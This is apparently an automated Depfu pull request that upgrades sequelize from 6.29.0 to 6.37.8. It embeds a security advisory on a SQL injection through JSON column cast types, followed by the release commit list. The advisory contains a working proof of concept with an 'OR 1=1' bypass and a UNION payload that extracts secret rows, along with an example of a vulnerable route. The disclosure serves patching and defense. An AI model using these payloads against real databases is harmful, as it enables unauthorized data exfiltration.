🚨 [security] [js] Update sequelize 6.29.0 → 6.37.8 (minor)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ sequelize (6.29.0 → 6.37.8) · Repo · Changelog

Security Advisories 🚨

🚨 Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type

Summary

SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS <type>) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table.

Affected: v6.x through 6.37.7. v7 (@sequelize/core) is not affected.

Details

In src/dialects/abstract/query-generator.js, _traverseJSON() extracts a cast type from :: in JSON keys without validation:

// line 1892
_traverseJSON(items, baseKey, prop, item, path) {
    let cast;
    if (path[path.length - 1].includes("::")) {
      const tmp = path[path.length - 1].split("::");
      cast = tmp[1];       // attacker-controlled, no escaping
      path[path.length - 1] = tmp[0];
    }
    // ...
    items.push(this.whereItemQuery(this._castKey(pathKey, item, cast), { [Op.eq]: item }));
}

_castKey() (line 1925) passes it to Utils.Cast, and handleSequelizeMethod() (line 1692) interpolates it directly:

return `CAST(${result} AS ${smth.type.toUpperCase()})`;

JSON path values are escaped via this.escape() in jsonPathExtractionQuery(), but the cast type is not.

Suggested fix — whitelist known SQL data types:

const ALLOWED_CAST_TYPES = new Set([
  'integer', 'text', 'real', 'numeric', 'boolean', 'date',
  'timestamp', 'timestamptz', 'json', 'jsonb', 'float',
  'double precision', 'bigint', 'smallint', 'varchar', 'char',
]);
if (cast && !ALLOWED_CAST_TYPES.has(cast.toLowerCase())) {

throw new Error(Invalid cast type: <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">cast</span><span class="pl-kos">}</span></span>);

}

PoC

npm install sequelize@6.37.7 sqlite3

const { Sequelize, DataTypes } = require('sequelize');
async function main() {

const sequelize = new Sequelize('sqlite::memory:', { logging: false });
const User = sequelize.define('User', {

username: DataTypes.STRING,

metadata: DataTypes.JSON,

});
const Secret = sequelize.define('Secret', {

key: DataTypes.STRING,

value: DataTypes.STRING,

});
await sequelize.sync({ force: true });
await User.bulkCreate([

{ username: 'alice', metadata: { role: 'admin', level: 10 } },

{ username: 'bob',   metadata: { role: 'user',  level: 5 } },

{ username: 'charlie', metadata: { role: 'user', level: 1 } },

]);
await Secret.bulkCreate([

{ key: 'api_key', value: 'sk-secret-12345' },

{ key: 'db_password', value: 'super_secret_password' },

]);
// TEST 1: WHERE clause bypass

const r1 = await User.findAll({

where: { metadata: { 'role::text) or 1=1--': 'anything' } },

logging: (sql) => console.log('SQL:', sql),

});

console.log('OR 1=1:', r1.map(u => u.username));

// Returns ALL rows: ['alice', 'bob', 'charlie']
// TEST 2: UNION-based cross-table exfiltration

const r2 = await User.findAll({

where: {

metadata: {

'role::text) and 0 union select id,key,value,null,null from Secrets--': 'x'

}

},

raw: true,

logging: (sql) => console.log('SQL:', sql),

});

console.log('UNION:', r2.map(r => <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">username</span><span class="pl-kos">}</span></span>=<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">metadata</span><span class="pl-kos">}</span></span>));

// Returns: api_key=sk-secret-12345, db_password=super_secret_password

}
main().catch(console.error);

Output:

SQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`
  FROM `Users` AS `User`
  WHERE CAST(json_extract(`User`.`metadata`,'$.role') AS TEXT) OR 1=1--) = 'anything';
OR 1=1: [ 'alice', 'bob', 'charlie' ]
SQL: SELECT id, username, metadata, createdAt, updatedAt

FROM Users AS User

WHERE CAST(json_extract(User.metadata,'$.role') AS TEXT) AND 0

UNION SELECT ID,KEY,VALUE,NULL,NULL FROM SECRETS--) = 'x';

UNION: [ 'api_key=sk-secret-12345', 'db_password=super_secret_password' ]

Impact

SQL Injection (CWE-89) — Any application that passes user-controlled objects as where clause values for JSON/JSONB columns is vulnerable. An attacker can exfiltrate data from any table in the database via UNION-based or boolean-blind injection. All dialects with JSON support are affected (SQLite, PostgreSQL, MySQL, MariaDB).

A common vulnerable pattern:

app.post('/api/users/search', async (req, res) => {
  const users = await User.findAll({
    where: { metadata: req.body.filter }  // user controls JSON object keys
  });
  res.json(users);
});

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 45 commits:

• fix: validate cast types in JSON where clauses
• Merge commit from fork
• meta: Fix MSSQL CI (#17931)
• fix(oracle): fix changeColumn SQL for BLOB to avoid implicit conversion (#17719)
• ci: use ubuntu-22.04 for jobs that use Node 10 (#17724)
• fix: add call for new maintainers to README (#17701)
• fix: cast numbers in DataTypes.STRING to strings (#17564)
• meta: ignore mssql failures for releasing v6 (#17524)
• fix(oracle): validate input with TO_TIMESTAMP_TZ and TO_DATE (#17516)
• fix(oracle): add support for Oracle Database 23ai (#17345)
• fix(postgres): use schema for foreign key constrains of a table (#17099)
• fix: add `readOnly` to the transaction options types and docs (#17226)
• fix(types): Add definition of `returning` in `SaveOptions`. (#16954)
• feat(postgres): support connectionTimeoutMillis dialectOption (#14119)
• feat(postgres): backport stream dialectOption to v6 (#16868)
• fix: sort keys by depth in groupJoinData (#16823)
• fix(mssql): allow calling describeTable a table with a dot in its name (#16769)
• feat: backport `findModel` to v6 (#16705)
• fix(oracle): clean constraints (#16694)
• fix(oracle): add missing default and not null condition to addColumn (#16619)
• feat(oracle): add support for lock (#16643)
• meta: add node-gyp globally (#16696)
• docs: add missing conflictAttributes to bulkCreate (#16573)
• feat(types): add TypeScript 5.2 support (#16442)
• meta: update lockfile (#16265)
• fix(types): remove escape from query-interface types (#15944)
• fix: bump dependencies (#16119)
• fix: move `types` condition to the front (#16085)
• feat(oracle): add width support for numerictype (#16073)
• feat(oracle): add new error messages introduced in new driver version (#16075)
• fix(oracle): reordered check constraint for unsigned numeric type (#16074)
• fix(oracle): For Raw queries avoid converting the input parameters passed (#16067)
• meta: use Node 18 in CI (#16000)
• fix(postgres): adds support for minifying through join aliases (#15897)
• feat: add beforePoolAcquire and afterPoolAcquire hooks (#15874)
• fix(postgres): prevent crash if postgres connection emits multiple errors (#15868)
• fix: update Slack invitation link (#15849)
• feat(postgres, sqlite): add conflictWhere option to Model.bulkCreate (#15788)
• meta(db2): remove node:util (#15819)
• feat(postgres, sqlite): allow override of conflict keys for bulkCreate (#15787)
• fix: pass CLS transaction to model hooks (#15818)
• feat(postgres, sqlite): add conflictWhere option to upsert (#15786)
• fix: fix unnamed dollar string detection (#15759)
• fix(postgres): escape identifier in createSchema and dropSchema (#15752)
• fix(postgres): make sync not fail when trying to create existing enum (#15718)

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)